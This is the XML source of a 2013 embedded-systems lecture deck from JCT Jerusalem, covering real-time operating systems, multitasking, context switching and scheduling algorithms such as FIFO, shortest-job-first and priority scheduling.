            <a:ext cx="2667000" cy="182745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dirty="0" smtClean="0"/>
              <a:t>process isolation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ring3 file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ring3 drivers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fault tolerance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>20k-64k (kernel only)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4953000"/>
            <a:ext cx="7620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ecos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788886" y="5334000"/>
            <a:ext cx="108972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threadx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="4998519"/>
            <a:ext cx="1219200"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openrtos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406032" y="4739910"/>
            <a:ext cx="8705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viper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4400887" y="2514600"/>
            <a:ext cx="856913"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minix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2941792" y="2514600"/>
            <a:ext cx="117300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neutrino</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3172584" y="2769162"/>
            <a:ext cx="1170816"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integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4400887" y="2781637"/>
            <a:ext cx="704513"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okl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406032" y="4739910"/>
            <a:ext cx="92771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viper1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Oval 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5929608" y="4998519"/>
            <a:ext cx="8705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linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Oval 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5448300"/>
            <a:ext cx="1175368"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windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Oval 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4998519"/>
            <a:ext cx="1170816" cy="2286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vxworks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120352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linux.org/images/c/c2/Android-system-archite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791325"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16856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blogs.msdn.com/resized-image.ashx/__size/550x0/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-79-60/4186.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20000" cy="556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67673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http://www.engineerlive.com/media/images/large/large_CONNECTStruc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400"/>
            <a:ext cx="7620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870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Embedded Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Omer Levy, Intel Corporation</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JCT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jerusalem</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spring Semester </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2013</a:t>
            </a:r>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Embedded Systems Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261898020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testech-elect.com/ghs/images/tx-diagra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924800" cy="492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85943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eveloper.blackberry.com/native/files/documentation/bb10/com.qnx.doc.neutrino.prog/images/sbi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395" y="1524000"/>
            <a:ext cx="5867400" cy="490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6699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imma.files.wordpress.com/2007/04/windowslivewriterpresentationinternalstructureofminix-4821minix-internal-structur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467600" cy="480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07425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Families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RTOS – Real Time Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The term “real-time” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>reflects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>requirements to ensure a certain response time to certain events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Compare:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Hard Real-Time System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – failing to meet a deadline causes system failure, possibly extreme consequences (pacemaker, ABS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Soft Real-Time System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – failing to meet a deadline may cause degraded service (streaming video)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RTOS sometimes refers to an OS that can fulfill real-time requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes also used as a general term for “OS for an embedded system”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129284023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Multitasking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Multitasking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> refers to the ability to execute multiple independent tasks, giving the appearance as if they are executing together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A.k.a. multi-threading, multi-programming, multi-processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simplifies design &amp; implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breaks software into smaller logical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May improve use of resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May improve user responsiveness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember: assuming a single processor, the processor can only do one thing at a time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368432665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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The scheduler is the key OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>A task can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>ready </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>suspended</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Determines which or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>ready</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t> tasks should be scheduled at a given point in time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>Implements the “context switch”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dozens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of scheduling algorithms exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A scheduling algorithm can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>preemptive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>non-preemptive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key parameters to measure a scheduling algorithm for a given system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU utilization (is the CPU busy at all times?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Waiting time (how long does a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>task wait </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>ready </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> states? Can any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>starved</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overhead (how much CPU is wasted on the scheduling algorithm itself?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impact on overall system response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6599806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Context Switch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A task’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> includes its processor state - all processor registers prior to context switch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The context is stored in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>task control block (TCB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In some cases the context is stored on the task stack, and the TCB only stores the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A context switch may occur at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>scheduling points</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>System call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(call into the OS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Creation of a task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Completion / deletion of a task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blocking / unblocking of tasks (through synchronization objects)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Interrupts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, especially timer interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A task can disable interrupts to prevent preemption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42544680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FIFO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The simplest scheduling algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A thread runs until it completes it’s job or relinquishes the CPU, and then the next thread is scheduled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non-preemptive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Longer jobs may starve other jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also called “cooperative multitasking”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306282999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Shortest Job First</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A thread runs until it completes it’s job or relinquishes the CPU, and then the thread with shortest CPU requirement scheduled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preemptive or Non-preemptive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How does the scheduler “know” the length of the thread?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Estimation algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Short jobs may starve longer jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280140170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Priority</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The most commonly used algorithm in the embedded world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each thread is associated with a priority, the highest priority thread is scheduled</a:t>
            </a:r>
